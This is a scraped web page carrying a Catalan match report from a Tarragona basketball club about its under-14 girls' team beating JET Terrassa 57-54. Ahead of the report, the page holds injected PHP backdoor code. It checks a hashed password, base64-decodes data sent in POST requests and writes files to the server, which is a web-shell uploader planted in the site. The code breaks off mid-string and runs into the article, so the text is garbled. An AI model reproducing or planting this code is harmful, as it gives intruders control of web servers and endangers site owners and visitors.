function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" L'Infantil Femení 08A fa un últim quart caòtic però guanya contra el JET Terrassa (57-54) - Tgn Bàsquet Club -

L’Infantil Femení 08A fa un últim quart caòtic però guanya contra el JET Terrassa (57-54)

Updated: febrer 8, 2022

L’Infantil Femení 08A va patir molts nervis fins els últims minuts precipitant-se en atac, però va acabar guanyant el seu segon partit d’aquesta segona fase contra el JET. Les liles no van aconseguir controlar el rebot en cap moment del partit, cosa que va donar moltes més oportunitats de tir a les de Terrassa. Les locals, al contrari que les visitants, van estar molt més encertades, cosa que va evitar veure una gran diferència en el marcador al descans (28-34). La segona meitat va seguir la tònica de la primera on les terrassenques van seguir fallant tirs, sobre tot triples, només van anotar un de quinze. Les tarragonines van saber aprofitar la baixada d’intensitat de les rivals al tercer període, i van aconseguir empatar el partit apunjant el nivell defensiu i apretant a tota la pista. L’últim quart va anar a un ritme frenètic on les noies entrenades per García no van saber aguantar la posseció veient que anaven guanyant. Per culpa dels nervis es van precipitar amb tirs forçats i innecessaris i també van perdre pilotes, però malgrat tot el partit es va acabar decantant per les del TGN.